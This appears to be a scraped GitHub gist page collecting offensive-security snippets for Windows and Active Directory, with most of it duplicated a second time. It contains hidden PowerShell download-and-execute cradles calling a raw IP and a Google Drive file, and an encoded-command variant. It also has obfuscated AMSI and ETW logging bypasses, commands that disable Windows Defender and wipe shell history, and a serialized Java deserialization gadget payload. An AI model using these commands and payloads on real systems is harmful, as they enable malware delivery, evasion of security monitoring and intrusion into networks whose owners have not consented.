BL/VCK htkcodes

## commands.ps1
$session=New-PSSession –Computername Server1

Enter-PSSession $session

Set-MpPreference -DisableRealtimeMonitoring $true

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

$ExecutionContext.SessionState.LanguageMode
#Enum Applocker policy if you stumble upon constrained language mode

## emailscraper.py

#I forked this from somewhere but i forgot where, it a had a regex bug which i fixed.
import re
fileToRead = 'emails.txt'
fileToWrite = 'emailExtracted.txt'
delimiterInFile = [',', ';']
def validateEmail(strEmail):
    # .* Zero or more characters of any type.
    if re.match("(.*)@(.*)\.(.*)", strEmail):
        return True

## 1) Active Directory One Liners
Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts

([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()


Grab Forest Trusts.

([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()


## Active Directory Attacks.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                htkcodes
                / Active Directory Attacks.md
            
            
              Created
              March 10, 2021 04:52
                — forked from ssstonebraker/Active Directory Attacks.md
            
              
                Active Directory Attacks #oscp
              
          
    Note: I did not author this, i found it somehwere.
Active Directory Attacks

Summary


Tools
Most common paths to AD compromise

MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)
Open Shares


[GPO - Pivoting with Local Admin


## zsh
 echo "" > ~/.zsh_history & exec $SHELL -l

 CLEARS ZSH HISTORY ^^

## Powershell_Downloader.ps1
powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download&id=0B1NUTMCAOKBTdVQzTXlUNHBmZUU',"$env:APPDATA\ps.exe");Start-Process ("$env:APPDATA\ps.exe")


## Version1
c:\Windows\System32\cmd.exe /c powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://45.58.34.196:8080/p')"


## Version2
c:\windows\system32\cmd.exe /c PowErsHelL.EXE -eXecUtiONPoLICy bYPass -NOPROfilE -WinDoWSTYlE hiDden -EnCodeDcOmmAnd IAAoAE4AZQB3AC0ATwBiAEoAZQBDAFQAIABzAFkAcwB0AEUAbQAuAG4AZQBUAC4AdwBlAGIAQwBsAEkARQBOAFQAKQAuAEQATwBXAG4AbABvAGEAZABGAEkAbABlACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBqAHQAYQBiA

## powershell-bypasses.ps1
# Logging bypass:

(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))

# AMSI Bypass (old, burned)

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

# New AMSI bypass obfuscation:

## powershell_cheat.ps1
//Disables Windows Defender
Set-MpPreference -DisableRealtimeMonitoring $true

## fckcustoms.js
// ==UserScript==
// @name         fckcustoms
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  Customs are literally scammers
// @author       You
// @require      http://code.jquery.com/jquery-3.4.1.min.js
// @match        https://www.amazon.com/gp/your-account/order-details*
// @run-at document-body
// @grant        none

## zen.sh
rO0ABXNyAElvcmcuc3ByaW5nZnJhbWV3b3JrLmNvcmUuU2VyaWFsaXphYmxlVHlwZVdyYXBwZXIkTWV0aG9kSW52b2tlVHlwZVByb3ZpZGVyskq0B4tBGtcCAANJAAVpbmRleEwACm1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMAAhwcm92aWRlcnQAP0xvcmcvc3ByaW5nZnJhbWV3b3JrL2NvcmUvU2VyaWFsaXphYmxlVHlwZVdyYXBwZXIkVHlwZVByb3ZpZGVyO3hwAAAAAHQADm5ld1RyYW5zZm9ybWVyc30AAAABAD1vcmcuc3ByaW5nZnJhbWV3b3JrLmNvcmUuU2VyaWFsaXphYmxlVHlwZVdyYXBwZXIkVHlwZVByb3ZpZGVyeHIAF2phdmEubGFuZy5yZWZsZWN0LlByb3h54SfaIMwQQ8sCAAFMAAFodAAlTGphdmEvbGFuZy9yZWZsZWN0L0ludm9jYXRpb25IYW5kbGVyO3hwc3IAMnN1bi5yZWZsZWN0LmFubm90YXRpb24uQW5ub3RhdGlvbkludm9jYXRpb25IYW5kbGVyVcr1DxXLfqUCAAJMAAxtZW1iZXJWYWx1ZXN0AA9MamF2YS91dGlsL01hcDtMAAR0eXBldAARTGphdmEvbGFuZy9DbGFzczt4cHNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABdAAHZ2V0VHlwZXN9AAAAAgAWamF2YS5sYW5nLnJlZmxlY3QuVHlwZQAdamF2YXgueG1sLnRyYW5zZm9ybS5UZW1wbGF0ZXN4cQB+AAZzcgBgb3JnLnNwcmluZ2ZyYW1ld29yay5iZWFucy5mYWN0b3J5LnN1cHBvcnQuQXV0b3dpcmVVdGlscyRPYmplY3RGYWN0b3J5RGVsZWdhdGluZ0ludm9jYXRpb25IYW5kbGVy
	$session=New-PSSession –Computername Server1

	Enter-PSSession $session

	Set-MpPreference -DisableRealtimeMonitoring $true

	Get-AppLockerPolicy -Effective \| select -ExpandProperty RuleCollections

	$ExecutionContext.SessionState.LanguageMode
	#Enum Applocker policy if you stumble upon constrained language mode

	#I forked this from somewhere but i forgot where, it a had a regex bug which i fixed.
	import re
	fileToRead = 'emails.txt'
	fileToWrite = 'emailExtracted.txt'
	delimiterInFile = [',', ';']
	def validateEmail(strEmail):
	# .* Zero or more characters of any type.
	if re.match("(.)@(.)\.(.*)", strEmail):
	return True
	Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts

	([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()


	Grab Forest Trusts.

	([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()
	echo "" > ~/.zsh_history & exec $SHELL -l

	CLEARS ZSH HISTORY ^^
	powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download&id=0B1NUTMCAOKBTdVQzTXlUNHBmZUU',"$env:APPDATA\ps.exe");Start-Process ("$env:APPDATA\ps.exe")


	## Version1
	c:\Windows\System32\cmd.exe /c powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://45.58.34.196:8080/p')"


	## Version2
	c:\windows\system32\cmd.exe /c PowErsHelL.EXE -eXecUtiONPoLICy bYPass -NOPROfilE -WinDoWSTYlE hiDden -EnCodeDcOmmAnd IAAoAE4AZQB3AC0ATwBiAEoAZQBDAFQAIABzAFkAcwB0AEUAbQAuAG4AZQBUAC4AdwBlAGIAQwBsAEkARQBOAFQAKQAuAEQATwBXAG4AbABvAGEAZABGAEkAbABlACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBqAHQAYQBiA
	# Logging bypass:

	(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))

	# AMSI Bypass (old, burned)

	sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

	# New AMSI bypass obfuscation:
	//Disables Windows Defender
	Set-MpPreference -DisableRealtimeMonitoring $true
	// ==UserScript==
	// @name fckcustoms
	// @namespace http://tampermonkey.net/
	// @version 0.1
	// @description Customs are literally scammers
	// @author You
	// @require http://code.jquery.com/jquery-3.4.1.min.js
	// @match https://www.amazon.com/gp/your-account/order-details*
	// @run-at document-body
	// @grant none